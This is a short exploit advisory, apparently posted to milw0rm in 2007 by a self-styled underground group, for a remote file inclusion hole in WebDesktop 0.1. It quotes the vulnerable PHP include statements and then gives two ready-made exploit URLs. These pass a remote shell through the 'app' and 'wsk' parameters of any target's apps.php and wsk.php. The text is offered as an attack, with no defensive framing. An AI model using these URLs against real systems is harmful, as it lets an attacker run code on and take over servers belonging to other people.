41 lines
No EOL
1.4 KiB
Text
41 lines
No EOL
1.4 KiB
Text
\\\|///
|
|
\\ - - // Xmors Underground Group
|
|
( @ @ )
|
|
----oOOo--(_)-oOOo--------------------------------------------------
|
|
Portal : WebDesktop 0.1
|
|
Download : http://downloads.sourceforge.net/pns-webdesktop/webDesktop-0.1-linux.tar.gz
|
|
Author : S.W.A.T.
|
|
HomePage : wWw.XmorS.CoM
|
|
Type : Remote File Inclusion
|
|
Y! ID : Svvateam
|
|
E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com
|
|
Dork : :(
|
|
----ooooO-----Ooooo--------------------------------------------------
|
|
( ) ( )
|
|
\ ( ) /
|
|
\_) (_/
|
|
|
|
|
|
|
|
+---------------------------------------------------------------------------------------------+
|
|
|
|
Vuln Code :
|
|
|
|
include($wsk . ".wsk/" . $wsk . ".php");
|
|
|
|
&&&&&&&&
|
|
|
|
include($app . ".app/" . $frm . ".frm/" . $frm . ".php");
|
|
|
|
+---------------------------------------------------------------------------------------------+
|
|
+---------------------------------------------------------------------------------------------+
|
|
|
|
Exploit :
|
|
|
|
http://[TARGET]/[PATH]/apps/apps.php?app=[-Sh3ll-]
|
|
http://[TARGET]/[PATH]/wsk/wsk.php?wsk=[-Sh3ll-]
|
|
|
|
|
|
+---------------------------------------------------------------------------------------------+
|
|
|
|
# milw0rm.com [2007-10-11] |